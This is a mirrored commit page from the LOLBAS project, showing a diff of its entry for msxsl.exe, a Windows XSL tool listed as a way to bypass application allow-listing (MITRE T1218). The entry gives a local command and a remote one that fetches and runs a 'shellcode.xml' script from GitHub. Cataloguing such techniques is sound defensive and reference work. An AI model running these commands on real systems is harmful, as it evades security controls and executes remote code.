public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

Completed template update of OterMSBinaries

Browse Source
This commit is contained in:
Conor Richard
2018-09-21 22:58:00 -04:00
parent 95dc80b8cd
commit 58e88b98f9
17 changed files with 189 additions and 67 deletions
Download Patch File Download Diff File Expand all files Collapse all files

19
yml/OtherMSBinaries/Msxsl.yml
View File

@@ -1,16 +1,27 @@
---
Name: msxsl.exe
Description: Execute
Author: ''
Description: Command line utility used to perform XSL transformations.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: msxsl.exe customers.xml script.xsl
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full Path:
- N/A
- ''
Code Sample: []
Detection: []
Resources: